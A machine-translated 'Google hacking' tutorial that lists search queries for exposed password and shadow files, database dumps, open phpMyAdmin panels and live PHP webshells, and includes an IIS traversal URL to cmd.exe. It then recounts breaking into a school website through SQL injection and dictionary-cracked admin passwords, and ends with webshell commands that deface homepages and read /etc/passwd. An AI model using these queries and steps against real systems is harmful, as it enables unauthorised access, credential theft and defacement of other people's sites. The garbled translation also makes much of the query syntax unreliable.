Google Advanced Skills-Google hack

Google Hacking is actually nothing new. At that time, Google Hacking didn't pay much attention to this technology and thought that webshell or something didn't have much practical use. Google Hacking is not so simple...

　　Common Google keywords:

Foo1 foo2 (that is, association, such as searching XX Company XX beauty)

Operator: foo

Filetype: 123 type

Site: foo.com is more interesting than directly viewing the website and can get a lot of unexpected information.

Intext: foo

Intitle: fooltitle title

Allinurl: Foo searches for all related connections of XX website. (Required)

Links: Foo. You just need to know its link.

Allintilte: foo.com

We can help "-" "+" to adjust the search Accuracy

Search for a password directly: (quotes indicate exact search)

Of course, we can extend it to the above results for secondary search.

"Index of" htpasswd/passwd

Filetype: xls Username Password email

"Ws_ftp.log"

"Config. php"

Allinurl: Admin MDB

Service filetype: Pwd... or a pcAnywhere password suffix, such as "CIF"

More and more interesting, and more sensitive information

"Robots.txt" "disallow:" filetype: txt

Inurl: _ vti_cnf (the key index of FrontPage, the CGI library of the scanner generally has a location)

Allinurl:/MSADC/samples/selector/Showcode. asp

Http://www.cnblogs.com/../passwd

/Examples/JSP/SNP/snoop. jsp

Phpsysinfo

Intitle: Index of/admin

Intitle: "documetation"

Inurl: search by multiple keywords such as 5800 (VNC port) or desktop Port

Webmin port 10000

Inurl:/admin/login. asp

Intext: powered by gbook365

Intitle: "php shell *" "enable stderr" filetype: PhP directly searches for phpwebshell

Foo.org filetype: Inc

IPSec filetype: Conf

Intilte: "error occurred" ODBC request where (select | insert) to put it bluntly, that is to say, you can directly look up the database for retrieval, for the current popular SQL injection, it will be developed.

"Dumping data for table" Username Password

Intitle: "Error Using hypernews"

"Server software"

Intitle: "http_user_agent = googlebot"

"Http_user_anget = googlebot" ths Admin

Filetype:. Doc site:. Mil classified

　　Check multiple keywords:

Intitle: config confixx Login Password

"Mydomain.com" Nessus report

"Report generated"

"Ipconfig"

"Winipconfig"

Google cache utilization (Hoho, the most influential thing), we recommend that you search for more "select all websites"

Special Recommendation: administrator users and other related things, such as names and birthdays ...... You can also use it as a dictionary.

......

　　A collection of tips:

1) index. Of. Password

1) filetype: BLT "buddylist"

2) "Access denied for user" "Using password"

2) intitle: "index of" inurl: FTP (pub | incoming)

3) "http: // *: * @ www" domainname

3) filetype: CNF inurl: _ vti_pvt access. CNF

4) auth_user_file.txt

4) allinurl: "/*/_ vti_pvt/" | allinurl: "/*/_ vti_cnf /"

5) the master list

5) inurl: "Install/install. php"

6) allinurl: Admin MDB

6) intitle: "Welcome. to. squeezebox"

7) passlist.txt (a better way)

7) intext: "" bitboard V2.0 "bitshifters bulletin board"

8) "A syntax error has occurred" filetype: ihtml

8) intitle: Login intext: "rt is? Copyright"

9) "#-FrontPage-" inurl: Service. pwd

9) Ext: PhP program_listing intitle: mythweb. program. Listing

10) orA-00921: unexpected end of SQL command

10) intitle: Index. Of abyss. conf
Simple implementation of Google Hacking

Some Google syntaxes can be used to provide us with more information (and, of course, to those who are used to attack more people they want .), the following describes some common syntaxes.

　　Intext:

This is to use a character in the body of the webpage as a search condition. for example, enter "intext: Net" in Google. returns all the web pages that contain "" in the webpage body. allintext: similar to intext.

　　Intitle:

Similar to the intext above, search for whether the webpage title contains the characters we are looking. for example, search: intitle: Security angel. all Web pages whose titles contain "Security Angel" will be returned. similarly, allintitle: is similar to intitle.

　　Cache:

Search for the cache of some content in Google, and sometimes you may find some good stuff.

　　Define:

Search for the definition of a word. Search: Define: hacker. The definition of hacker is returned.

　　Filetype:

I would like to recommend that you use this tool to collect information about specific targets, whether it is a web attack or what we will talk about later. search for files of the specified type. for example, input: filetype: Doc. all file URLs ending with Doc will be returned. of course, if you are looking. bak ,. MDB or. inc is also available, and more information may be obtained :)

　　Info:

Query the basic information of a specified site.

　Inurl:

Search for the specified characters in the URL. For example, if you enter inurl: Admin, N Connections similar to this are returned: http://www.xxx.com/xxx/admin.

The URL is good. allinurl is similar to inurl, and multiple characters can be specified.

　　Link:

For example, search: inurl: www.4ngel.net can return all URLs connected to www.4ngel.net.

　　Site:

This is also useful. For example, site: www.4ngel.net. will return all URLs related to this site of 4ngel.net.

　　There are also some * operators that are also useful:

+ Display columns that may be ignored by Google as the query range

-Ignore a word

~ Word of consent

. Single wildcard

* Wildcard, which can represent multiple letters

"" Precise Query

Let's start with the actual application.

The following content is searched on Google. For a tested attacker, he may be most interested in the password file. However, Google often has powerful search capabilities.

Expose some sensitive information to them. Use Google to search for the following content:

Intitle: "index of" etc

Intitle: "index of". sh_history

Intitle: "index of". bash_history

Intitle: "index of" passwd

Intitle: "index of" People. lst

Intitle: "index of" PWD. DB

Intitle: "index of" etc/shadow

Intitle: "index of" spwd

Intitle: "index of" Master. passwd

Intitle: "index of" htpasswd

"#-FrontPage-" inurl: Service. pwd

Sometimes important password files are exposed to the network without protection for various reasons. If they are obtained by someone with ulterior motives, the harm is very great. you can also use Google to search for programs with vulnerabilities. For example, if zeroboard found a file code leakage vulnerability some time ago, you can use Google to find websites that use this program on the Internet:

Intext: zeroboard filetype: PHP

Or use:

Inurl: outlogin. php? _ Zb_path = site:. JP

To find the page we need. phpMyAdmin is a set of powerful database * software. Due to misconfiguration of some sites, we can directly perform * on phpMyAdmin without using the password. we can use Google to search for the program URLs with such vulnerabilities:

Intitle: phpMyAdmin intext: Create new database

Http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe? Dir? You may also find many antique-grade machines by using Google. We can also use this to find pages with other CGI vulnerabilities.

Allinurl: winnt system32

As mentioned above, Google can be used to search for database files. Some syntaxes can be used to precisely search for more information (Access database, MSSQL, MySQL Connection Files, etc ). for example:

Allinurl: BBS data

Filetype: MDB inurl: Database

Filetype: Inc Conn

Inurl: Data filetype: MDB

Intitle: "index of" data // This often occurs on Apache + Win32 servers with incorrect configuration. Like the above principle, we can also use Google to find the background.

Google can be used to collect and penetrate information on a site. Next we will use Google to perform a test on a specific site.

First, use Google to check some basic information about the site (some details are omitted ):

Site: xxxx.com

Find the domain names of several school departments from the returned information:

Http://a1.xxxx.com

Http://a2.xxxx.com

Http://a3.xxxx.com

Http://a4.xxxx.com

By the way, the ping should be performed on different servers. Schools generally have a lot of good information. First, check whether there are any good things.

Site: xxxx.com filetype: Doc

Get n good doc files.

First look for the website management background address:

Site: xxxx.com intext: Management

Site: xxxx.com inurl: Login

Site: xxxx.com intitle: Management

More than 2 Admin backend addresses:

Http://a2.xxxx.com/sys/admin_login.asp

Http://a3.xxxx.com: 88/_ admin/login_in.asp

Pretty good. Let's see what programs are running on the server:

Site: a2.xxxx.com filetype: ASP

Site: a2.xxxx.com filetype: PHP

Site: a2.xxxx.com filetype: aspx

Site: a3.xxxx.com filetype: ASP

Site :.......

......

On the A2 server, IIS is used, ASP is used, and a PHP Forum is also used.

The A3 server is also IIS, aspx + ASP. Web programs should all be developed by themselves. If you have a forum, you can see if you can meet any public FTP account or something:

Site: a2.xxxx.com intext: ftp ://*:*

No value found. Check againCheck whether there are any upload vulnerabilities:

Site: a2.xxxx.com inurl: File

Site: a3.xxxx.com inurl: Load

A file upload page is found on A2:

Http://a2.xxxx.com/sys/uploadfile.asp

I checked it with IE and did not have the access permission. Try injection,

Site: a2.xxxx.com filetype: ASP

Get the address of n asp pages, and let the software do the physical work. This program obviously does not prevent injection, and the dbowner permission is not high, but it is enough, and the back a shell is not very nice.

In addition, it seems that the database is not small, and the password of the web administrator is directly exposed. Then, MD5 encryption is passed. In general, the passwords of school sites are relatively regular, usually domain names +

The transformation of the telephone type should be done with Google.

Site: xxxx.com // obtain N second-level domain names

Site: xxxx.com intext: * @ xxxx.com // get n email addresses and the name of the email owner.

Site: xxxx.com intext: Phone Number // n

Create a dictionary of the information and then run it slowly. After a while, I ran out of four accounts, two of which were from the student union, one administrator, and one possibly from the teacher's account. Login:

Name: website administrator

Pass: a2xxxx7619 // Let's talk about it, that is, the domain name + 4 digits

How to escalate the permission is not discussed in this article.

During this time, I looked at some Google hack research sites outside China. In fact, they are almost all about the flexible use of some basic syntaxes, or working with a script vulnerability mainly depends on my flexible thinking. There are not many defense measures for Google hack in foreign countries, so we are still waiting till now, so don't try to crack it. For some Web administrators running Apache on windows, they should pay more attention to this aspect. An intitle: Index of will almost all come out :)

1.Search for webshell using PHP

Intitle: "php shell *" "enable stderr" filetype: PHP

(Note: intitle-the webpage title enable stderr-UNIX standard output and the abbreviated filetype-file type for standard errors ). In the search results, you can find many

The Web shell of the command line. If the phpshell you find won't be used, if you are not familiar with Unix, you can directly look at the list, which is not detailed here and has a lot of useful value. It should be noted that some of the foreign phpshells we searched here use Unix commands, which are all functions called by the system (in fact, Baidu and other search engines can be used, only fill in different search content ). This phpwebshell can directly echo (commonly used Unix Commands ). One sentence:

Echo "summon"> index. jsp

Now let's look at the homepage and change it to "summon.

We can also use wget to upload a file (for example, the leaf you want to replace ). Execute Command and enter cat File> index.html or echo ""> File

Echo "test"> File

In this way, the site homepage is replaced successfully. You can also

Uname-A; CAT/etc/passwd

However, you must note that some webshell programs cannot be executed due to problems,

2.Search for Inc sensitive information

In the Google search box, enter:

Code:

. Org filetype: Inc